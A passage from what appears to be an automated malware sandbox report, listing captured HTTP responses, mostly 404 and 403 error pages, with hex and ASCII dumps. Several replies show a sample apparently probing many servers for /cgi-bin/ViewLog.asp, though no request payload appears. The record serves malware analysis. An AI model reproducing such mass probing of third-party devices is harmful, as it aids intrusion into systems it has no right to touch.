27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 56 42 4d 48 20 26 72 61 71 75 6f 3b 20 66 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 62 6d 68 2e 6e 6c 2f 66 65 65 64 2f 22 20 2f 3
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Thu, 23 Nov 2023 04:17:54 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:17:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 05:17:53 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:17:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Vary: Accept-EncodingETag: W/"62a83cc4-2ea3"Content-Encoding: gzipData Raw: 32 30 66 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 84 79 d7 12 83 da 72 e5 3b 5f e1 f1 3c e2 5b 08 44 10 c7 a1 8a 9c 73 e6 8d 9c 33 48 80 cb ff 6e ce bd 63 8f 67 fc 60 a9 54 da 82 66 ab 37 ec ee 5e 6b f5 3f fd 2f d6 60 dc c8 e4 fe ae de 87 fe 5f 80 7f fa 8f af 22 c9 9f 5f 43 b1 27 7f 97 d5 c9 ba 15 fb 3f ff fd b1 97 7f f9 fc fd 73 78 db af be f8 97 74 ca af 7f 2d a7 71 ff 4b 99 0c 4d 7f fd 41 ad 4d d2 ff 83 58 f4 df 62 6f b2 e4 1f b6 64 dc fe b2 15 6b 53 fe e3 5f cd b6 e6 2e fe 80 91 f9 fc c7 bd 38 f7 bf 24 7d 53 8d 7f 64 c5 b8 17 eb bf d5 f0 bf 66 53 3f ad 7f fc ef 17 ce fc 17 73 04 7b cc fb 66 2c fe 52 17 4d 55 ef 7f e0 af e7 c0 90 ac 55 33 fe 65 9f e6 3f 30 7c 3e ff ad 19 aa 7f fd 2f c7 d0 c7 e6 df 80 7f 82 fe e6 e7 33 a8 ff b6 9c 3f 3d 7e dc 7f ac ff 6e 5b b3 7f fe fb 3c d9 93 3f 9a 21 a9 0a a8 9d ab 7f 4c 93 ad c0 d1 7f 80 c8 16 42 29 ca 72 ba 58 b6 2b 8a a6 2c 8e 72 28 5a a2 28 16 42 7e 34 4b 51 dc 9f c7 fe a7 0f f3 a7 0d f0 57 c3 4a 62 a8 ff f1 a3 fe 6d f2 ff 9c f8 bf 5f 03 fc cf 93 fc f7 8b fe 76 8d 0a fd 28 ca 66 28 ea a6 b4 8a a5 6c 8e 02 a8 fa 59 c2 c9 d1 d0 c7 a2 c4 e7 ec 63 f8 2c 4d 7b 96 f5 8c ff f3 d5 49 4c c5 09 f4 cf e2 99 9f c6 fc 69 6b d3 7f 9e 8c 9e b9 3c 86 b6 9e 6b 7e 91 09 fc d5 fe f9 41 53 de 63 5c 51 8c cd 39 dc 69 d5 4c ed 35 9a c7 05 5a a3 33 9e 9d 75 91 5d b3 de 28 d0 9d 3d dd 3a 1b 61 1e 22 5f b9 18 a3 5b 1a 20 bf 12 e2 28 ba fa 3f f7 ec b9 e9 ff df 8b a5 2a eb af de 2a f6 e3 39 f5 e7 52 b9 e7 df 35 fe ff da 71 cc b3 22 47 73 38 57 1a b8 cb 8b 78 1a c8 12 ae d5 10 95 7e 95 50 42 51 3f f6 59 1e c3 59 9a 4d b1 1f ea 00 b1 37 22 4f 06 25 f9 13 b8 3b eb 62 0f 58 79 d7 e1 32 b3 55 37 6b 17 36 fc ca b3 87 d0 b3 99 77 64 89 1a c0 5b d6 3e fa 71 94 4b 79 95 a2 30 34 fd 76 fa f5 2b 8f 76 9e dd b7 ba d5 ca d1 b6 14 8a cc 59 72 12 27 4f 75 b0 7a 6b 0b c1 9b 2b 29 29 ea 56 25 32 f9 76 09 92 c9 29 11 fc 02 7c 69 b5 c4 76 e7 1b a9 63 fd d6 e2 30 6d 4a 81 36 54 67 53 37 7d d8 2d be ba 8e c5 ee 30 26 ac 76 f5 3c 19 70 3a 89 9f 3a 4c e2 1a ea f1 96 60 46 fa f3 95 8e 18 73 d2 af 0f 7c 1a bf 51 0e dd e8 3b 79 f8 de 6a 09 b3 32 5e bf 79 11 77 99 e1 40 b2 69 c9 d9 59 95 45 ca 83 3b 9f 52 a6 61 f2 9c 91 a2 d9 86 3b 35 67 42 ee f6 27 52 ff f9 06 9e 61 84 32 35 fc f1 d9 9e 18 88 64 43 89 a9 9f f5 2f ed e3 e4 ea 8f 84 34 58 9f 70 8e 2a f8 3a bf 6a 94 6d 7a d1 70 11 16 44 0b c1 10 b1 5d 5e 9f af 11 70 9f 9a e5 02 59 01 18 24 b7 b4 cc 46 bb c9 16 14 cf 0a 94 ac 0a 0a c3 e1 a6 65 bf 9a 23 8c 96 6d ca 7d 0b 5c 02 f9 34 a6 29 3b ef 41 24 cd 8e bc 05 9d 68 a1 2f 4a cf ef ff d7 b3 bf fa a6 be ec a3 5c 75 f3 0d 9f 6d 22 5e 77 30 0b b7 1e f7 c9 a1 ca 7b 68 0e 11 37 be 44 59 48 ba 68 82 64 58 72 41 6d ea 9a 01 f3 88 c0 b9 6b 9f df 1a dc cb 54 40 9e 05 da 1d 88 cf ae 5d c5 a5 83 4e 57 7b 9c a4 af 61 d4
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 23 Nov 2023 04:18:00 GMTContent-Type: text/htmlContent-Length: 0Connection: closeETag: "65589d6c-0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 23 Nov 2023 04:17:59 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:17:59 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 23 Nov 2023 04:17:59 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 23 Nov 2023 04:17:59 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:18:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=8Vary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8Vary: Accept-EncodingX-Content-Type-Options: nosniffDate: Thu, 23 Nov 2023 04:18:02 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8Vary: Accept-EncodingX-Content-Type-Options: nosniffDate: Thu, 23 Nov 2023 04:18:02 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:18:03 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Thu, 23 Nov 2023 04:18:03 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Nov 2023 16:34:31 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 462Server: Jetty(9.4.31.v20200723)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 68 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 63 6c 69 70 73 65 2e 6f 72 67 2f 6a 65 74 74 79 22 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 20 39 2e 34 2e 33 31 2e 76 32 30 32 30 30 37 32 33 3c 2f 61 3e 3c 68 72 2f 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.4.31.v20200723</a><hr/></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 462Server: Jetty(9.4.31.v20200723)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 68 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 63 6c 69 70 73 65 2e 6f 72 67 2f 6a 65 74 74 79 22 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 20 39 2e 34 2e 33 31 2e 76 32 30 32 30 30 37 32 33 3c 2f 61 3e 3c 68 72 2f 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.4.31.v20200723</a><hr/></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 05:18:16 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:18:12 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Thu, 23 Nov 2023 04:18:13 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:18:20 GMTServer: Apache/2.4.10 (Debian)Content-Length: 426Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 